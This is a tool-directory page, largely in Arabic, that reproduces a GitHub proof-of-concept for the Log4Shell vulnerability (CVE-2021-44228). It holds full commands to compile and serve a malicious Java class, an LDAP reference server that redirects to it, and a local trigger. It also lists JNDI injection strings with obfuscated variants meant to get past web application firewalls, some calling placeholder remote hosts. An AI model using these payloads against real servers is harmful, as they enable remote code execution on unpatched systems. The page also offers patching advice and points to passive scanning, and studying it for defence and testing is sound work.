Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-44228-Apache-Log4j-Rce — إثبات مفهوم لاستغلال CVE-2021-44228 (Log4Shell) مع حقن JNDI، وخادم مرجعي LDAP، وتقنيات تجاوز جدار الحماية (WAF) لاختبار ثغرات تنفيذ الأكواد عن بُعد (RCE) في Log4j. | Kitploit
أدوات/GitHubGitHub/yuuki1967/cve-2021-44228-apache-log4j-rce
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتجاوز WAFاختبار الاختراق
GitHubyuuki1967/cve-2021-44228-apache-log4j-rce

CVE-2021-44228-Apache-Log4j-Rce

إثبات مفهوم لاستغلال CVE-2021-44228 (Log4Shell) مع حقن JNDI، وخادم مرجعي LDAP، وتقنيات تجاوز جدار الحماية (WAF) لاختبار ثغرات تنفيذ الأكواد عن بُعد (RCE) في Log4j.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
2منذ 8 أشهرلم تتم المراجعة بعد
مشاركة

CVE-2021-44228(تنفيذ التعليمات البرمجية عن بُعد في Apache Log4j)

جميع إصدارات log4j-core >=2.0-beta9 و <=2.14.1

إصدارات 1.x تحتوي على ثغرات أخرى، وننصح بتحديثها إلى أحدث إصدار.

النشرات الأمنية / النشرات المرتبطة بـ Log4Shell (CVE-2021-44228)

الاستخدام:

قم بتنزيل هذا المشروع، وقم بتجميع كود الاستغلال blob/master/src/main/java/Exploit.java، ثم ابدأ خادم ويب يسمح بتنزيل الملف الثنائي المترجم.

root@kitploit:~
git clone https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce.git
cd CVE-2021-44228-Apache-Log4j-Rce

javac Exploit.java

# start webserver
# For Python2
python -m SimpleHTTPServer 8888
# For Python3
python3 -m http.server 8888

# make sure python webserver is running the same directory as Exploit.class, to test
  curl -I 127.0.0.1:8888/Exploit.class

قم بتنزيل مشروع آخر وشغّل تنفيذ خادم LDAP الذي يُرجع مراجع JNDI https://github.com/mbechler/marshalsec/blob/master/src/main/java/marshalsec/jndi/LDAPRefServer.java

root@kitploit:~
git clone https://github.com/mbechler/marshalsec.git cd marshalsec # Java 8 required mvn clean package -DskipTests java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"

قم ببناء وتشغيل كود التفعيل (لمحاكاة هجوم log4j على خادم ويب جافا ضعيف) blob/master/src/main/java/log4j.java، وسيظهر تطبيق الآلة الحاسبة لديك.

root@kitploit:~
cd CVE-2021-44228-Apache-Log4j-Rce
mvn clean package
java -cp target/log4j-rce-1.0-SNAPSHOT-all.jar log4j

# expect the following
# 1. calculator app appear
# 2. in ldapserver console,
#  Send LDAP reference result for Exploit redirecting to http://127.0.0.1:8888/Exploit.class
# 3. in webserver console,
#  127.0.0.1 - - [....] "GET /Exploit.class HTTP/1.1" 200 -


نصائح:

لا تعتمد على إصدار Java الحالي لإنقاذك. قم بتحديث Log4 (أو أزل بحث JNDI). وعطّل التوسيع (يبدو ذلك فكرة سيئة على أي حال).

تجاوز rc1

على سبيل المثال:

root@kitploit:~
${jndi:ldap://127.0.0.1:1389/ badClassName}

تجاوز WAF

root@kitploit:~
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

لا تثق بجدار الحماية لتطبيقات الويب.

تفاصيل الثغرة

توفر Lookups طريقة لإضافة قيم إلى إعدادات Log4j في أماكن عشوائية.

Lookups

الطرق التي تسبب التسرب في finally

root@kitploit:~
LogManager.getLogger().error()
LogManager.getLogger().fatal()

طريقة تحقق بسيطة

إذا كنت تريد إجراء اختبار الصندوق الأسود، أقترح عليك القيام بالفحص السلبي.

BurpLog4jScan

استمتع!!! BurpLog4jScan.png

النجوم عبر الزمن

النجوم عبر الزمن

تنزيل الأداة